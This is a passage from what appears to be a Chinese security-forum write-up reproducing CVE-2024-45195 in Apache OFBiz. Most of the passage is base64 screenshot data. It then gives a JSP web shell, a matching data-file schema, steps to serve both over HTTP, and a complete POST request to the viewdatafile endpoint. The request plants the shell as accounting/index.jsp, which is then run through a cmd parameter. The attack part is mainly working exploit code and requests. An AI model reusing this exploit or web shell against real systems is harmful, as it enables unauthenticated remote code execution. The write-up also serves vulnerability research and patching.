INoeBQbeLTu/RJfe+YxYtlJlnJlAreV5liUilYoDRiN42ic+rICSmkcx0WvLadgQUfZ9sC/4suPbic/dZVs2ccm24i6EZwo0JioRTlEmzvo6K7gOxqlwPhlomv1qMJg0QkDxk/CYonH4qim7Tz8nf+RI14AKkrntm1E0rNEoxZqN/veJ+C4NHf00dmiSLS1oVMTVL3aJ9uXEEIIIYQQvyHuycBOa00ul6NcLt/087a2tjua+r++aAKwMYBTm37uShAQGIN2bzGT4y26Ma593W9m26FjDFU/4K9/8gLzuTJe0zYeT/4uO26xDh7A+qkvrQU30s++Y3uJTPyIf/jJBxQ9H2/gabp6D687mkLrCitX3uD0j96kGIvUY9MAv+b/Ghmum4RRFjBVioUCJS8c7Vb86FfkZi+Qq2k2nplC6QhaGwI/uKtyBJUUF17+ay5bS2zbQzz77DEOXLvCXHZSsnZCCCGEEOK31j0X2DUlEiSTSXK5HFrfGOhorWltbSUSiawFd9aCqf9APcao/13d9cyXt6NRNk82W2NfWw+O0vgErD9CpVLGRHtIqHCtNaU1zW1d9VJZIEI87uLnZphPZS
<p blockindex=39><code>getModelDataFile</code> 返回数据模型对象</p>
<p blockindex=40>进入<code>writeDataFile</code> 方法,传入文件保存位置的参数</p>
<p blockindex=41><img src="data:image/png;base64,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
<p blockindex=42><code>writeDataFile</code> 当中保存shell</p>
<h2 blockindex=43>五、漏洞复现</h2>
<p blockindex=44>创建文件rcereport.txt</p>
<pre blockindex=45><code class="hljs language-jsx">&lt;% Runtime.getRuntime().exec(request.getParameter(<span class=hljs-string>"cmd"</span>));%&gt;
</code></pre>
<p blockindex=46>rceschema.xml</p>
<pre blockindex=47><code class="hljs language-jsx">&lt;data-files xsi:noNamespaceSchemaLocation=<span class=hljs-string>"&lt;http://ofbiz.apache.org/dtds/datafiles.xsd&gt;"</span> xmlns:xsi=<span class=hljs-string>"&lt;http://www.w3.org/2001/XMLSchema-instance&gt;"</span>&gt;
<span class=xml><span class=hljs-tag>&lt;<span class=hljs-name>data-file</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"jspshell"</span> <span class=hljs-attr>separator-style</span>=<span class=hljs-string>"fixed-length"</span> <span class=hljs-attr>type-code</span>=<span class=hljs-string>"text"</span> <span class=hljs-attr>start-line</span>=<span class=hljs-string>"0"</span> <span class=hljs-attr>encoding-type</span>=<span class=hljs-string>"UTF-8"</span>&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>record</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"jspshell"</span> <span class=hljs-attr>limit</span>=<span class=hljs-string>"many"</span>&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>field</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"jspshell"</span> <span class=hljs-attr>type</span>=<span class=hljs-string>"String"</span> <span class=hljs-attr>length</span>=<span class=hljs-string>"60"</span> <span class=hljs-attr>position</span>=<span class=hljs-string>"0"</span>&gt;</span><span class=hljs-tag>&lt;/<span class=hljs-name>field</span>&gt;</span>
<span class=hljs-tag>&lt;/<span class=hljs-name>record</span>&gt;</span>
<span class=hljs-tag>&lt;/<span class=hljs-name>data-file</span>&gt;</span></span>
&lt;/data-files&gt;
</code></pre>
<p blockindex=48>rceschema.xml里面几个主要的值</p>
<p blockindex=49>data-file必须和数据包里的DEFINITION_NAME值相同</p>
<p blockindex=50>length长度为rcereport.txt-1</p>
<p blockindex=51>在这两个文件的目录下起一个python http服务 <code>python -m http.server</code></p>
<p blockindex=52>发送数据包即可</p>
<pre blockindex=53><code class="hljs language-jsx">POST /webtools/control/forgotPassword/viewdatafile HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: <span class=hljs-number>127.0</span><span class=hljs-number>.0</span><span class=hljs-number>.1</span>:<span class=hljs-number>8443</span>
User-Agent: Mozilla/<span class=hljs-number>5.0</span> (Windows NT <span class=hljs-number>10.0</span>; Win64; x64; rv:<span class=hljs-number>130.0</span>) Gecko/<span class=hljs-number>20100101</span> Firefox/<span class=hljs-number>130.0</span>
<span class=hljs-attr>Accept</span>: text/html,application/xhtml+xml,application/xml;q=<span class=hljs-number>0.9</span>,image/avif,image/webp,image/png,image/svg+xml,*<span class=hljs-comment>/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: JSESSIONID=2778A721833652B44A6A08356E4855B3.jvm1; OFBiz.Visitor=10000
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Site: cross-site
Content-Length: 246
DATAFILE_LOCATION=http://127.0.0.1:8000/rcereport.txt&amp;DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&amp;DATAFILE_IS_URL=true&amp;DEFINITION_LOCATION=http://127.0.0.1:8000/rceschema.xml&amp;DEFINITION_IS_URL=true&amp;DEFINITION_NAME=jspshell
</span></code></pre>
<p blockindex=54><img src="data:image/png;base64,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
最后访问/accounting/index.jsp?cmd=calc</p>
<p blockindex=55><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABIoAAAL4CAYAAAAUKxwFAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdeXxV9Z3/8de592ZjDUsiIMQNi4SlLhW1RWRQiSPVWn60M0gQGNH5jUNHQUq11mmsdcNU5VfrzE90QAlSp/7sjBZq0FpEXHBBhyVqGxGCyhKWENYs95zfH+fc/dybe5N7kxDez8cjkNx7tnuWe875nM/38zXWbX/LQkRERERERERETnqejl4AERERERERERHpHBQoEhERERERERERQIEiERERERERERFxKFAkIiIiIiIiIiKAAkUiIiIiIiIiIuLwpTpCji+H7lndyfHlkOXNJtubRZYnC6/Hm4nlExERERERERHpUvymnyaziUZ/E03+RhqaGzjSdISG5oaOXrTkAkXds3vQJzef7tndyfJmZXqZRERERERERES6LK/Hi9fjJdeXG/F6k7+JI41HOHC8jiONhztk2RIGinK8OZzS8xR65fRqr+URERERERERETkpZXmzyM/LJz8vn/qGenYf2k2Dv32zjFwDRT6Pj8IehfTJ64OB0a4LJCIiIiIiIiJysuuV04ueOT05cOwAew7vodlsbpf5xgSKfB4fQ3oPoXt293ZZABERERERERERiWVg0DevL9meHHbU1+A3/RmfZ0SvZ9nebM7se4aCRCIiIiIiIiIinUSPnO6c0ecMsr3ZGZ9XMKOoe3Z3hvQegs/Tcn1r07I40niEo01HaDabaTab8JtmRhe0s/EYBh7DR5bXS443hx7ZPcj25bTfAhhgWGBhtd88RURERERERDohC8Ay8BgGGGBZXe9eOdeXy5l9z2R73XaONR3L2Hx8YFfbHtRrUItBouPNx9l1aDeHGw9lbIFOZFkeH/26F9C/W7+MzcMI7PCW4YSIVENKRERERERETm6G84+FBU5ShWEYdLXcCp/Hx6k9B/FF3baMNUPzAAzpPYQcb/xsGL/l5+v6r6jeV60gUQJNZjO7Du3kL/v+ypHGI+mduLOD20FRBYdERERERERE4jEwwKRLdtCVm5XH4F6DMzZ9T9+8vvTI7hF3gGazmS/2f8H+YwcythBdTWNzA18c+IJ9x/alaYoGlmkqPiQiIiIiIiKSrECGEVaXCxj1zOlJ37y+GZm2p7BHYdw3G5obqN5XzfHm4xmZeVe3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
<h2 blockindex=56>六、总结</h2>
<p blockindex=57>CVE-2024-45195和之前的CVE-2024-36104的执行命令方式大致相似,只不过是将ProgramExport和EntitySQLProcessor换成了viewdatafile来执行代码</p></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2024-09-10 10:00:01
</li>
<li>阅读 ( 211 )</li>
<li>分类:<a href=https://forum.butian.net/articles/Web2 target=_blank rel="noopenner noreferrer">Web应用</a>
</li>
<li><a href=# class=report_btn data-source_type=vulnerabilities_article data-source_id=586 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=article data-source_id=586 data-support_num=0> 0 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=article data-source_id=586> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">0 条评论</h2>
<div class=comment>
</div>
<div class="widget-comment-form row mb-20">
<form class=col-md-12>
<div class=form-group>
<textarea id=comment-content name=content placeholder=写下你的评论 class=form-control value></textarea>
</div>
</form>
<div class="col-md-12 text-right">
<button type=submit data-token=KBlqCi9iR3cp99NzzsAGOmmMqvT6dwaZVPrSYLox data-source_id=586 data-source_type=article class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
